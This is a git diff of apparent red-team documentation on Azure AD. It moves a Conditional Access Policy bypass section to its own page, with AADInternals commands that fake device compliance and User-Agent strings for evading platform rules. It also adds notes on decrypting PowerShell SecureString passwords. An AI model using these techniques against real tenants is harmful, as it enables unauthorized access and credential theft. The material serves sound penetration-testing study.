diff --git a/docs/cloud/azure/azure-access-and-token.md b/docs/cloud/azure/azure-access-and-token.md index 63ba974..30b9cca 100644 --- a/docs/cloud/azure/azure-access-and-token.md +++ b/docs/cloud/azure/azure-access-and-token.md @@ -1,4 +1,4 @@ -# Azure AD Tokens +# Azure AD - Tokens ## Connection diff --git a/docs/cloud/azure/azure-ad-conditional-access-policy.md b/docs/cloud/azure/azure-ad-conditional-access-policy.md new file mode 100644 index 0000000..f0ac745 --- /dev/null +++ b/docs/cloud/azure/azure-ad-conditional-access-policy.md @@ -0,0 +1,62 @@ +# Azure AD - Conditional Access Policy + +Conditional Access is used to restrict access to resources to compliant devices only. + +* Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database) + +| CAP | Bypass | +|---------------------------|---------| +| Location / IP ranges | Corporate VPN, Guest Wifi | +| Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) | +| Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) | +| Azure AD Joined Device | Try to join a VM (Work Access)| +| Compliant Device (Intune) | Fake device compliance | +| Device requirement | / | +| MFA | / | +| Legacy Protocols | / | +| Domain Joined | / | + + +## Bypassing CAP by faking device compliance + +```powershell +# AAD Internals - Making your device compliant +# Get an access token for AAD join and save to cache +Get-AADIntAccessTokenForAADJoin -SaveToCache +# Join the device to Azure AD +Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64" +# Marking device compliant - option 1: Registering device to Intune +# Get an access token for Intune MDM and save to cache (prompts for credentials) +Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache +# Join the device to Intune +Join-AADIntDeviceToIntune -DeviceName "SixByFour" +# Start the call back +Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour" +``` + +## Bypassing CAP with device.trustType + +The trustType property is an internal attribute that defines the relationship between the device and Azure AD. +When the condition of CAP is `device.trustType -eq ""`, the values can be: + +* `AzureAD`: Azure AD joined devices +* `Workplace`: Azure AD registered devices +* `ServerAD`: Hybrid joined devices + + +## Bypassing CAP with user agent + +There are several devices you can use to authenticate and interact with a service. +Try several `User-Agent` to get access to the resources: + +* Windows: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 GLS/100.10.9939.100` +* Linux: `Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq` +* macOS: `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq` +* Android: `Mozilla/5.0 (Linux; Android 13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.117 Mobile Safari/537.36` +* iOS: `Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/98.0.4758.85 Mobile/15E148 Safari/604.1` +* WindowsPhone: `Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Lumia 650) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Safari/537.36` + + +## Bypassing CAP with location + +Try different IP locations using a VPN. \ No newline at end of file diff --git a/docs/cloud/azure/azure-ad-connect.md b/docs/cloud/azure/azure-ad-connect.md index def3cb5..66260f2 100644 --- a/docs/cloud/azure/azure-ad-connect.md +++ b/docs/cloud/azure/azure-ad-connect.md @@ -1,4 +1,4 @@ -# Azure AD Connect +# Azure AD - Azure AD Connect | Active Directory | Azure AD | |-----------------------------------|-------------------| diff --git a/docs/cloud/azure/azure-devices-users-sp.md b/docs/cloud/azure/azure-devices-users-sp.md index 277e7b2..6cd9788 100644 --- a/docs/cloud/azure/azure-devices-users-sp.md +++ b/docs/cloud/azure/azure-devices-users-sp.md @@ -1,4 +1,4 @@ -# Azure AD IAM +# Azure AD - IAM > Root Management Group (Tenant) > Management Group > Subscription > Resource Group > Resource diff --git a/docs/cloud/azure/azure-enumeration.md b/docs/cloud/azure/azure-enumeration.md index b823570..529520a 100644 --- a/docs/cloud/azure/azure-enumeration.md +++ b/docs/cloud/azure/azure-enumeration.md @@ -1,4 +1,4 @@ -# Azure AD Enumerate +# Azure AD - Enumerate ## Azure AD - Collectors @@ -199,43 +199,6 @@ Subdomain Service ``` -## Conditional Access Policy - -Conditional Access is used to restrict access to resources to compliant devices only. - -* Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database) - -| CAP | Bypass | -|---------------------------|---------| -| Location / IP ranges | Corporate VPN, Guest Wifi | -| Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) | -| Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) | -| Azure AD Joined Device | Try to join a VM (Work Access)| -| Compliant Device (Intune) | Fake device compliance | -| Device requirement | / | -| MFA | / | -| Legacy Protocols | / | -| Domain Joined | / | - - -Bypassing conditional access by faking device compliance - -```powershell -# AAD Internals - Making your device compliant -# Get an access token for AAD join and save to cache -Get-AADIntAccessTokenForAADJoin -SaveToCache -# Join the device to Azure AD -Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64" -# Marking device compliant - option 1: Registering device to Intune -# Get an access token for Intune MDM and save to cache (prompts for credentials) -Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache -# Join the device to Intune -Join-AADIntDeviceToIntune -DeviceName "SixByFour" -# Start the call back -Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour" -``` - - ## Multi Factor Authentication * [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services diff --git a/docs/cloud/azure/azure-persistence.md b/docs/cloud/azure/azure-persistence.md index d1249ac..250a186 100644 --- a/docs/cloud/azure/azure-persistence.md +++ b/docs/cloud/azure/azure-persistence.md @@ -1,4 +1,4 @@ -# Azure Persistence +# Azure AD - Persistence ## Add Secrets to Application diff --git a/docs/cloud/azure/azure-phishing.md b/docs/cloud/azure/azure-phishing.md index f8e246f..f92f108 100644 --- a/docs/cloud/azure/azure-phishing.md +++ b/docs/cloud/azure/azure-phishing.md @@ -1,4 +1,4 @@ -# Azure AD Phishing +# Azure AD - Phishing ## Illicit Consent Grant diff --git a/docs/cloud/azure/azure-requirements.md b/docs/cloud/azure/azure-requirements.md index 0633c4c..1753cf6 100644 --- a/docs/cloud/azure/azure-requirements.md +++ b/docs/cloud/azure/azure-requirements.md @@ -1,4 +1,4 @@ -# Azure Requirements +# Azure - Requirements ## Pentest Requirements diff --git a/docs/redteam/evasion/windows-defenses.md b/docs/redteam/evasion/windows-defenses.md index 736ea4d..a6dbd62 100644 --- a/docs/redteam/evasion/windows-defenses.md +++ b/docs/redteam/evasion/windows-defenses.md @@ -10,6 +10,7 @@ * [Just Enough Administration](#just-enough-administration) * [Contrained Language Mode](#constrained-language-mode) * [Script Block Logging](#script-block-logging) + * [SecureString](#securestring) * [Protected Process Light](#protected-process-light) * [Credential Guard](#credential-guard) * [Event Tracing for Windows](#event-tracing-for-windows) @@ -168,6 +169,37 @@ function Enable-PSScriptBlockLogging ``` +### SecureString + +A `SecureString` in PowerShell is a data type designed to store sensitive information like passwords or confidential data in a more secure manner than a plain string. Unlike a regular string, which stores data in plain text and can be easily accessed in memory, a `SecureString` encrypts the data in memory, providing better protection against unauthorized access. + +Convert to SecureString + +```ps1 +$original = 'myPassword' +$secureString = ConvertTo-SecureString $original -AsPlainText -Force +$secureStringValue = ConvertFrom-SecureString $secureString +``` + +Get the original content + +```ps1 +$secureStringBack = $secureStringValue | ConvertTo-SecureString +$bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureStringBack); +$finalValue = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($bstr) +``` + +When a `SecureString` is created, the plain text characters are encrypted immediately using the Data Protection API (**DPAPI**) + +Using the AES key + +```ps1 +[Byte[]] $key = (49,222,...,87,159) +$pass = (echo "AA...AA=" | ConvertTo-SecureString -Key $key) +[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($pass)) +``` + + ## Protected Process Light Protected Process Light (PPL) is implemented as a Windows security mechanism that enables processes to be marked as "protected" and run in a secure, isolated environment, where they are shielded from attacks by malware or other unauthorized processes. PPL is used to protect processes that are critical to the operation of the operating system, such as anti-virus software, firewalls, and other security-related processes.